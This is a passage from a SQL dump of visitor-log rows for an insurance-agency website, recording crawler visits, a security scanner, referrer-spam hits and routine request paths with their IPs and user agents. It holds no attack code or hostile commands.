6','','','','','','','','0','0',0),(22713,'0b_76bc09b9ee03d6e8c94b9b3f509459a9','1461992768','91.200.12.26','huangdisisi0708.com','/?author=5','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(22716,'0b_aafcefd2592acd5deb132358185e9c4a','1461993807','173.208.169.42','173.208.169.42','/','Mozilla/37.0.2 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(22718,'0b_c8be87768738240f4071891295cc405e','1461996518','221.231.6.195','221.231.6.195','/templets/default/style/dedecms.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://empireins.com','',0,'','','cn','','','Spoofer bot','','','','0','0',0),(22721,'0b_2291e6a5a44bf651a34a3b929664e510','1461997914','144.140.234.43','144.140.234.43','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36','https://www.google.com.au/','_notprovided_',1,'Win7','Chrome 45','au','','Google AU','','','','','0','0',0),(22722,'0b_ae7d520d094e96bc39712451f9f4e3c2','1461998166','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22725,'0b_2bc747ca1cf620cf0d7f86a35d842f29','1461998811','192.3.145.139','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(22727,'0b_aed3a37994a40529ed4ffb4af3b813c8','1461998866','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(22730,'0b_aed3a37994a40529ed4ffb4af3b813c8','1461999168','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22733,'0b_aed3a37994a40529ed4ffb4af3b813c8','1461999320','66.249.64.24','crawl-66-249-64-24.googlebot.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22736,'0b_810e8f88cee4991cae93b7b28a18bca6','1461999960','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22737,'0b_73889ff9c4dffb60cf04614bb745f5cd','1461999963','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22739,'0b_810e8f88cee4991cae93b7b28a18bca6','1461999964','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22740,'0b_4eb6a29a4cb5fd2c2f483e84998d29e5','1462000126','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22743,'0b_7403e20119e81c1167e7243d39c415fa','1462003188','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22746,'0b_8b6386ccc22cd050af83ca57e2b567e9','1462003643','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)','http://www.x720.net/','',0,'Win95','IE 5','','','','','','','','0','0',0),(22749,'0b_8b6386ccc22cd050af83ca57e2b567e9','1462003643','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)','http://www.x720.net/','',0,'Win95','IE 5','','','','','','','','0','0',0),(22751,'0b_0784a7467558ce8cba3b34527c862167','1462003646','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01','http://www.hifidesign.ru/','',0,'WinXP','Opera 8','ru','','','','','','','0','0',0),(22752,'0b_01615c62761349455350dbf131247b52','1462004526','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22755,'0b_a3f515a7eda4b8c64f36707fb70208cd','1462005156','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22758,'0b_2acf060f8f275720743fd0dafb5803ab','1462008184','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22760,'0b_015730814d00ba5d753aaf1e4ef3a3a8','1462010506','91.121.112.142','mansfield3.didici.be','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(22761,'0b_015730814d00ba5d753aaf1e4ef3a3a8','1462010509','91.121.112.142','mansfield3.didici.be','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(22764,'0b_d45676092716bdaa9b73d1d112703622','1462010523','66.249.64.94','crawl-66-249-64-94.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22767,'0b_d45676092716bdaa9b73d1d112703622','1462010536','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(22770,'0b_d45676092716bdaa9b73d1d112703622','1462010537','66.249.64.29','crawl-66-249-64-29.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22772,'0b_d1c7e8f29bddefa46574809ba6b4a30f','1462012432','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22775,'0b_0246901318e0b1f0d273cbe5912efd40','1462014523','207.46.13.97','msnbot-207-46-13-97.search.msn.com','[404] /documents/NoMoreHassles.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22778,'0b_534f83391a603647bc20d609670b1d0e','1462016249','62.210.148.246','mj9.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(22781,'0b_534f83391a603647bc20d609670b1d0e','1462016249','62.210.148.246','mj9.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(22784,'0b_534f83391a603647bc20d609670b1d0e','1462016257','62.210.148.246','mj9.naefmarco.ch','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(22785,'0b_534f83391a603647bc20d609670b1d0e','1462016260','62.210.148.246','mj9.naefmarco.ch','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(22787,'0b_534f83391a603647bc20d609670b1d0e','1462016265','62.210.148.246','mj9.naefmarco.ch','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(22788,'0b_534f83391a603647bc20d609670b1d0e','1462016267','62.210.148.246','mj9.naefmarco.ch','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(22790,'0b_534f83391a603647bc20d609670b1d0e','1462016270','62.210.148.246','mj9.naefmarco.ch','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(22791,'0b_237043c188e3b2a4c1540784342507f5','1462016405','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/robots.txt','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','Unknown Spider','','','','3','0',0),(22793,'0b_237043c188e3b2a4c1540784342507f5','1462016406','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22794,'0b_237043c188e3b2a4c1540784342507f5','1462016406','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22796,'0b_237043c188e3b2a4c1540784342507f5','1462016407','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22797,'0b_237043c188e3b2a4c1540784342507f5','1462016408','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/agent-tools/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22800,'0b_237043c188e3b2a4c1540784342507f5','1462016410','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/register/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22803,'0b_237043c188e3b2a4c1540784342507f5','1462016410','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/register/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22805,'0b_237043c188e3b2a4c1540784342507f5','1462016410','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22806,'0b_237043c188e3b2a4c1540784342507f5','1462016410','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22808,'0b_237043c188e3b2a4c1540784342507f5','1462016411','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/insentives/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22811,'0b_237043c188e3b2a4c1540784342507f5','1462016412','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22812,'0b_237043c188e3b2a4c1540784342507f5','1462016412','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/carriers/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22815,'0b_237043c188e3b2a4c1540784342507f5','1462016412','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/carriers/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22818,'0b_237043c188e3b2a4c1540784342507f5','1462016413','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22820,'0b_237043c188e3b2a4c1540784342507f5','1462016414','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/case-status/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22823,'0b_237043c188e3b2a4c1540784342507f5','1462016414','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/forms/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22824,'0b_237043c188e3b2a4c1540784342507f5','1462016414','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/forms/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22827,'0b_237043c188e3b2a4c1540784342507f5','1462016415','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/igo/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22829,'0b_237043c188e3b2a4c1540784342507f5','1462016416','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/term-quotes/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22830,'0b_237043c188e3b2a4c1540784342507f5','1462016417','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22832,'0b_237043c188e3b2a4c1540784342507f5','1462016417','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22835,'0b_237043c188e3b2a4c1540784342507f5','1462016417','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/igo/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22836,'0b_237043c188e3b2a4c1540784342507f5','1462016418','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22839,'0b_237043c188e3b2a4c1540784342507f5','1462016418','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/term-quotes/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22841,'0b_237043c188e3b2a4c1540784342507f5','1462016419','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22842,'0b_237043c188e3b2a4c1540784342507f5','1462016419','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22845,'0b_237043c188e3b2a4c1540784342507f5','1462016419','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22848,'0b_237043c188e3b2a4c1540784342507f5','1462016419','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22850,'0b_237043c188e3b2a4c1540784342507f5','1462016420','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/?page_id=169','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22851,'0b_237043c188e3b2a4c1540784342507f5','1462016421','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22854,'0b_237043c188e3b2a4c1540784342507f5','1462016421','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/register/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22856,'0b_237043c188e3b2a4c1540784342507f5','1462016422','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22859,'0b_237043c188e3b2a4c1540784342507f5','1462016422','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22862,'0b_237043c188e3b2a4c1540784342507f5','1462016422','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22865,'0b_237043c188e3b2a4c1540784342507f5','1462016423','54.204.176.76','ec2-54-204-176-76.compute-1.amazonaws.com','/members/','Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)','','',0,'WinNT','','','','','','','','','3','0',0),(22868,'0b_e4721bc1046daa76fa91c0f84d20afc2','1462017792','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22871,'0b_cd1c257b82c87e288868d2b26ca0a5a0','1462018296','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22874,'0b_21e8f409674a9e50fe65288bddf39c45','1462020931','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22875,'0b_810779c62da7d855ec752c67cc03b249','1462022384','216.81.71.161','216.81.71.161','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(22878,'0b_e6323f10dcd019be05cac021378d12b8','1462022406','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22881,'0b_2a8c9088edf3aa2f5b2d87c434427141','1462023076','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)','http://ladykrossovki.ru/','',0,'WinXP','AOL 9','ua','','','','','','','0','0',0),(22884,'0b_73bae32cacca8f8b53efbcb16442fb08','1462023919','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22886,'0b_85e71aa9f094aabc7cc1088d749f4c8b','1462026331','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/about-us/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22887,'0b_9f33d806babe3688f2757ebba8ee29e2','1462028610','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22890,'0b_9f33d806babe3688f2757ebba8ee29e2','1462028614','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22893,'0b_9f33d806babe3688f2757ebba8ee29e2','1462028616','69.175.22.218','newscan02.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22895,'0b_9f33d806babe3688f2757ebba8ee29e2','1462028618','69.175.22.218','newscan02.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22896,'0b_9f33d806babe3688f2757ebba8ee29e2','1462028620','69.175.22.218','newscan02.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22899,'0b_9f33d806babe3688f2757ebba8ee29e2','1462028622','69.175.22.218','newscan02.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22901,'0b_5ed060c1bf68d2d2ec5f42e2c12a236b','1462029061','66.249.64.29','crawl-66-249-64-29.googlebot.com','/hot.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22904,'0b_1ca17b60b98ca020b77e70714a51136c','1462030305','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22907,'0b_fdb54b532aab7590daef3fbbcc6aca2d','1462030343','180.76.15.163','baiduspider-180-76-15-163.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22908,'0b_7f9ba3613f57f27ed3237860958ecd40','1462033193','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22911,'0b_f5f9bb06e90f8c3bf8cec1e95d89ae21','1462034528','46.119.113.162','sol-fttb.162.113.119.46.sovam.net.ua','/?author=1','','','',0,'','','ua','','','Unknown Spider','','','','0','0',0),(22913,'0b_bd0693757d0b92da9fd314218c3bec00','1462034839','199.87.154.255','tor.les.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(22916,'0b_80cafd89b4760dfba2b5817c63475fcd','1462035013','54.91.232.143','ec2-54-91-232-143.compute-1.amazonaws.com','/robots.txt','CCBot/2.0 (http://commoncrawl.org/faq/)','','',0,'','','us','','','commoncrawl','','','','0','0',0),(22917,'0b_80cafd89b4760dfba2b5817c63475fcd','1462035014','54.91.232.143','ec2-54-91-232-143.compute-1.amazonaws.com','/','CCBot/2.0 (http://commoncrawl.org/faq/)','','',0,'','','us','','','commoncrawl','','','','0','0',0),(22920,'0b_83835fd90462ea2d5dca8f817504806b','1462036098','104.218.192.150','104.218.192.150','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 33','us','','','','','','','0','0',0),(22922,'0b_5f76cbf135e3df50248d32a100272d1a','1462036113','191.96.101.55','191.96.101.55','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 33','us','','','','','','','0','0',0),(22925,'0b_f817b2f09dc7da033ef57e56c6a408ac','1462038229','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22926,'0b_4f1a8747204b77cb55c03b361bd2d788','1462039233','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22929,'0b_adb889026e90d5d50e57c27b53141e2f','1462045156','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22932,'0b_f4ee0c4eb483c1c4bef7cebadb5b53a3','1462045169','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22934,'0b_cca23cec55d2bd516b7404afd4aebd17','1462046055','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22937,'0b_cc306300d9fbf706da035485db6f9be6','1462047149','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(22938,'0b_cc306300d9fbf706da035485db6f9be6','1462047150','68.180.230.123','b115363.yse.yahoo.net','/?p=319','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(22940,'0b_cc306300d9fbf706da035485db6f9be6','1462047493','68.180.230.123','b115363.yse.yahoo.net','/igo/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(22941,'0b_37a536a4db8672d93058f5975c7d5d5c','1462050420','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown 